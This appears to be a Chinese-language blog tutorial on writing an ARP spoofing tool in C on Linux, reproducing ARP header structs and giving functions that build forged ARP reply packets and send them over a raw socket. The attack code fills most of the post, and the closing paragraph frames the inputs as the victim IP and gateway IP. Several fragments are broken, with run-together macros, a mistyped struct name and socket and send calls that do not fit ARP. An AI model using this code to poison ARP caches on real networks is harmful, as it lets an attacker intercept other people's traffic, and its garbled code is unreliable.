1、利用原始套接字實現arp欺騙：

      首先我們要清楚arp的原理：

這樣我們就可以很清楚我們要做什麼了：

2、既然這樣我們就可以十分明白自己該怎樣做了。

  來看一下linux下的一些對於arp頭部的構造的原始碼和各個欄位的常見引數解析：去檔案/usr/include/net/if_arp.h /ustr/include/netinet/ether.h

struct arphdr
  {
    unsigned short int ar_hrd;/* Format of hardware address.  */
    unsigned short int ar_pro;/* Format of protocol address.  */
    unsigned char ar_hln;/* Length of hardware address.  */
    unsigned char ar_pln;/* Length of protocol address.  */
    unsigned short int ar_op;/* ARP opcode (command).  */
#if 0
    /* Ethernet looks like this : This bit is variable sized
       however...  */
    unsigned char __ar_sha[ETH_ALEN];/* Sender hardware address.  */
    unsigned char __ar_sip[4];/* Sender IP address.  */
    unsigned char __ar_tha[ETH_ALEN];/* Target hardware address.  */
    unsigned char __ar_tip[4];/* Target IP address.  */
#endif
  };

structether_arp {
struct arphdr ea_hdr;/* fixed-size header */
u_int8_t arp_sha[ETH_ALEN];/* sender hardware address */
u_int8_t arp_spa[4];/* sender protocol address */
u_int8_t arp_tha[ETH_ALEN];/* target hardware address */
u_int8_t arp_tpa[4];/* target protocol address */
};
#definearp_hrdea_hdr.ar_hrd
#definearp_proea_hdr.ar_pro
#definearp_hlnea_hdr.ar_hln
#definearp_plnea_hdr.ar_pln
#definearp_opea_hdr.ar_op

實現對於arp的頭部的構造，（arp中的option選項是有著   1  reques 2 reply 3 rarp request 4 rarp reply）

這裡你要恢復的是應答包：

struct arphdr * Setarp()

{

  struct arphdr * arp = calloc(1, sizeof(struct arphdr));

  arp->ar_hrd=htons(ARPHRD_ETHER);

  arp->ar_op=htons(ARPOP_REPLY);

  arp->ar_pro=htons(ETHERTYPE_IP);

  arp->ar_hln=ETH_ALEN;

  arp->ar_pln=4;

  return arp;

}

struct ether_arp * setArpPacket(u_int8_t * sendip,u_int8_t * sendMac ,u_int8_t * src_ip,u_int8_t * srcMAC)

{

  struct ether_arp * arp = calloc(1,ARP_LEN_MAX);

  arp->ea_hdr=*Setarp();

  memcpy(arp->arp_sha, sendMac, ETH_ALEN);

  memcpy(arp->arp_spa, sendip,4 );

  memcpy(arp->arp_tha, srcMAC, ETH_ALEN);

  memcpy(arp->arp_tpa,src_ip,4);

  return arp;

}

建立過程，對於如果使用libpcap傳送的時候還要構造一個MAC 頭部

/*

   #defineETHERTYPE_PUP0x0200          /* Xerox PUP */
#define ETHERTYPE_SPRITE0x0500/* Sprite */
#defineETHERTYPE_IP0x0800/* IP */
#defineETHERTYPE_ARP0x0806/* Address resolution */
#defineETHERTYPE_REVARP0x8035/* Reverse ARP */
#define ETHERTYPE_AT0x809B/* AppleTalk protocol */
#define ETHERTYPE_AARP0x80F3/* AppleTalk ARP */
#defineETHERTYPE_VLAN0x8100/* IEEE 802.1Q VLAN tagging */
#define ETHERTYPE_IPX0x8137/* IPX */
#defineETHERTYPE_IPV60x86dd/* IP protocol version 6 */
#define ETHERTYPE_LOOPBACK0x9000/* used to test interfaces */

*/

也就是  struct mac_header{

u_char dst[6];

u_char src[6];

u_short type;

};

這裡到底type   選擇 ==0x806

2、傳送arp資料，

   其實利用原始套接字有一個選項直接可以實現對於arp的選項

   這裡為

int sockfd;

 sockfd=socket(PF_INET, SOCK_RAW,  htons(ETH_P_ARP));

 if(sockfd==-1)

 {

return 0;

 }

構造頭部，

memcpy(buff,arp,ARP_LEN_MAX);

memcpy(buff+ARP_LEN_MAX,temp,strlen(buff));

傳送資料出去：

int num =  sendto(sockfd,buff,MAX,0,(struct sockaddr *)&server,sizeof(struct sockaddr_in));

   if(num>0){

    printf("%s",temp);

  }

    sleep(10);

其實實際清楚原理後這個是非常簡單的實現。這個原始碼也是非常簡單。如果對於什麼自己的MAc地址大家可以使用這個unix系統的萬能函式ioctl函式去獲取網絡卡裝置的上的ip地址，mac地址，廣播等資訊，這樣我們再去編序arp欺騙是就發現我們輸入的引數就只有了攻擊ip和 閘道器ip，這樣輸入更加少了，更加智慧一些吧。自己能力還是有限的哈，希望各位前輩多多提意見。